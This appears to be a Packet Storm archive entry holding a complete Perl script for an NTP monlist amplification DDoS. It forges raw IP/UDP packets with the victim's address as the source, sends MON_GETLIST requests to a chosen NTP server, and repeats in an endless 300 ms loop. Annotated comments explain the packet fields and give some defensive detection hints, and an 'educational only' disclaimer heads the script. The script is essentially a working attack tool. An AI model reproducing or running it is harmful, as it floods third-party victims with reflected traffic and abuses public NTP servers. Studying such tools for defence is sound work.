NTP MON_GETLIST Query Amplification DDoS

2015-07-09T00:00:00
ID PACKETSTORM:132622
Type packetstorm
Reporter Todor Donev
Modified 2015-07-09T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# ntp MON_GETLIST query amplification ddos  
#  
# Copyright 2015 (c) Todor Donev   
# todor.donev@gmail.com  
# http://www.ethical-hacker.org/  
# https://www.facebook.com/ethicalhackerorg  
#  
# A Network Time Protocol (NTP) Amplification   
# attack is an emerging form of Distributed   
# Denial of Service (DDoS) that relies on the   
# use of publicly accessible NTP servers to
# overwhelm a victim system with UDP traffic.  
# The NTP service supports a monitoring service   
# that allows administrators to query the server   
# for traffic counts of connected clients. This   
# information is provided via the “monlist”   
# command. The basic attack technique consists   
# of an attacker sending a "get monlist" request   
# to a vulnerable NTP server, with the source   
# address spoofed to be the victim’s address.   
#  
#  
# Disclaimer:  
# This or previous program is for Educational  
# purpose ONLY. Do not use it without permission.  
# The usual disclaimer applies, especially the  
# fact that Todor Donev is not liable for any  
# damages caused by direct or indirect use of the  
# information or functionality provided by these  
# programs. The author or any Internet provider  
# bears NO responsibility for content or misuse  
# of these programs or any derivatives thereof.  
# By using these programs you accept the fact  
# that any damage (dataloss, system crash,  
# system compromise, etc.) caused by the use  
# of these programs is not Todor Donev's  
# responsibility.  
#  
# Use at your own risk and educational   
# purpose ONLY!  
#  
# See also, UDP-based Amplification Attacks:  
# https://www.us-cert.gov/ncas/alerts/TA14-017A  
#  
#  
  
use Socket;  
  
# A PF_INET/SOCK_RAW socket (opened below) needs root, so bail out early
# when the effective UID is not 0.
if ( $< != 0 ) {
print "Sorry, must be run as root!\n";
print "This script use RAW Socket.\n";
exit;
}

# Element [4] of gethostbyname's list is the packed 4-byte IPv4 address.
# Both are file-scoped and read later by iphdr() and send_packet():
# $ntpd goes into the IP destination field, $victim into the IP *source*
# field, i.e. the source address is spoofed so replies land on the victim.
my $ntpd = (gethostbyname($ARGV[0]))[4]; # IP Address Destination (32 bits)
my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits)

print "[ ntpd MON_GETLIST query amplification ]\n";
# gethostbyname returns an empty list on failure, so a missing argument or
# an unresolvable name leaves the slot undef and triggers the usage text.
if (!defined $ntpd || !defined $victim) {
print "[ Usg: $0 <ntp server> <victim>\n";
print "[ <todor.donev\@gmail.com> Todor Donev ]\n";
exit;
}
print "[ Sending NTP packets: $ARGV[0] -> $ARGV[1]\n";
# Protocol 255 is IPPROTO_RAW: the process supplies the entire IP header
# itself (on Linux this protocol also implies IP_HDRINCL).
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
# Level 0 / option 1 are bare numbers and their meaning is platform
# specific: on Linux, IPPROTO_IP option 1 is IP_TOS (IP_HDRINCL is 3).
# NOTE(review): presumably intended as a header-include flag -- confirm.
setsockopt(RAW, 0, 1, 1) or die $!;
main();
  
# Main program: assemble one spoofed datagram (IP + UDP + NTP mode 7
# request) and hand it to send_packet(), which loops forever and therefore
# never returns to this point.
sub main {
my $packet;

$packet = iphdr();
$packet .= udphdr();
$packet .= ntphdr();
# b000000m...
send_packet($packet);
}
  
# IP header (Layer 3)
# Builds a 20-byte IPv4 header with source = $victim and destination =
# $ntpd (both file-scoped, set from @ARGV). The IP checksum is left 0.
sub iphdr {
my $ip_ver = 4; # IP Version 4 (4 bits)
my $iphdr_len = 5; # IP Header Length (4 bits)
my $ip_tos = 0; # Differentiated Services (8 bits)
# Header-length word + 20, i.e. 25 -- not the byte length of the assembled
# datagram. With IP_HDRINCL the Linux kernel fills the total-length field
# itself, so this value presumably never reaches the wire -- confirm on
# other platforms.
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
my $ip_frag_id = 0; # Identification Field (16 bits)
# Both literals below are octal *numbers* (value 0), not bit strings; they
# stringify to "0" each, so the B16 field receives "00" and is zero-padded.
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
# Packed with 'h2' (hex string, low nybble first), so the decimal 255 is
# emitted as 0x52, not 0xFF.
my $ip_ttl = 255; # IP TTL (8 bits)
my $ip_proto = 17; # IP Protocol (8 bits)
my $ip_checksum = 0; # IP Checksum (16 bits)

# IP Packet
# Template: H2 ("45" -> version/IHL byte), H2 (TOS), n (total length),
# n (ID), B16 (flags+offset), h2 (TTL), c (protocol), n (checksum),
# a4 (source = victim), a4 (destination = NTP server).
my $iphdr = pack(
'H2 H2 n n B16 h2 c n a4 a4',
$ip_ver . $iphdr_len, $ip_tos,
$ip_total_len, $ip_frag_id,
$ip_frag_flag . $ip_frag_offset,
$ip_ttl, $ip_proto, $ip_checksum,
$victim, $ntpd
);
return $iphdr;
}
  
# UDP Header (Layer 4)
# Builds the 8-byte UDP header in front of the NTP payload. The length field
# is derived by calling ntphdr() once more, so it always matches the payload
# main() appends afterwards.
sub udphdr {
my $udp_src_port = 31337; # UDP Source Port (16 bits) (0-65535)
my $udp_dst_port = 123; # UDP Dest Port (16 bits) (0-65535)
my $udp_len = 8 + length(ntphdr()); # UDP Length (16 bits) (0-65535)
# Checksum left 0 (checksum omitted); IPv4 permits this for UDP. It is a
# ones'-complement sum over a pseudo-header when present, not an XOR.
my $udp_checksum = 0; # UDP Checksum (16 bits)

# UDP Packet
my $udphdr = pack(
'n n n n',
$udp_src_port,
$udp_dst_port,
$udp_len,
$udp_checksum
);
return $udphdr;
}
  
# NTP Header (Layer 7)
# Builds an NTP mode 7 ("private"/monitoring) request whose request code
# 0x2a is MON_GETLIST -- the "monlist" query. For defenders: the same two
# bytes (first byte 0x27, fourth byte 0x2a) are what a UDP/123 detection
# rule keys on, and ntpd configured with `restrict ... noquery` or
# `disable monitor` does not answer this request (ntp 4.2.7p26 and later
# no longer implement monlist at all).
sub ntphdr {
# 0x27 = 0b00100111: R=0, M=0, VN=4, Mode=7. (The note below says
# "Version field to 2"; the literal actually carries version 4.)
my $rm_vn_mode = 0x27;

# Response bit to 0, More bit to 0, Version field to 2, Mode field to 7
#
# A mode 7 packet is used exchanging data between an NTP server
# and a client for purposes other than time synchronization, e.g.
# monitoring, statistics gathering and configuration. A mode 7
# packet has the following format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |R|M| VN | Mode|A| Sequence | Implementation| Req Code |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Err | Number of data items | MBZ | Size of data item |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | Data (Minimum 0 octets, maximum 500 octets) |
# | |
# | [...] |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Encryption Keyid (when A bit set) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | Message Authentication Code (when A bit set) |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# where the fields are (note that the client sends requests, the server
# responses):
# Response Bit: This packet is a response (if clear, packet is a request).
# More Bit: Set for all packets but the last in a response which
# requires more than one packet.
# Version Number: 2 for current version
# Mode: Always 7
# This byte is the A bit plus the 7-bit sequence number; 0 means
# unauthenticated, sequence 0.
my $auth = 0x00; # If set, this packet is authenticated.

my $implementation = 0x03; # Implementation: 0x00 (UNIV), 0x02 (XNTPD_OLD), 0x03 (XNTPD)
# The number of the implementation this request code
# is defined by. An implementation number of zero is used
# for request codes/data formats which all implementations
# agree on. Implementation number 255 is reserved (for
# extensions, in case we run out).

my $request = 0x2a; # Request code is an implementation-specific code which specifies the
# operation to be (which has been) performed and/or the
# format and semantics of the data included in the packet
# 0x02 (PEER_INFO), 0x03 (PEER_STATS), 0x04 (SYS_INFO),
# 0x04 (SYS_STATS), 0x2a (MON_GETLIST)
# NTP packet
# Each "2" repeat count consumes two values, so the four arguments fill
# the first four bytes and the remaining four bytes (err/count, MBZ/size)
# appear to pack as zero -- 8 bytes in total; verify with length(ntphdr()).
my $ntphdr = pack(
'W2 C2 C2 C2',
$rm_vn_mode,
$auth,
$implementation,
$request
);
return $ntphdr;
}
  
# Sends the prepared datagram ($_[0], read straight from @_) to $ntpd
# every 300 ms, forever. The only exits are a failed send() (die) or an
# external signal; nothing counts or limits the packets.
sub send_packet {
while(1){
# Four-argument select() with no handles is used purely as a sub-second sleep.
select(undef, undef, undef, 0.30); # Sleep 300 milliseconds
# The destination is a hand-packed sockaddr_in: native unsigned short
# family, big-endian port 60, the 4-byte address, then 8 zero bytes.
# Socket's sockaddr_in(PORT, ADDR) builds the same structure; the port
# is presumably ignored for a raw socket -- confirm.
send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $ntpd)) or die $!;
}
}
  
  
`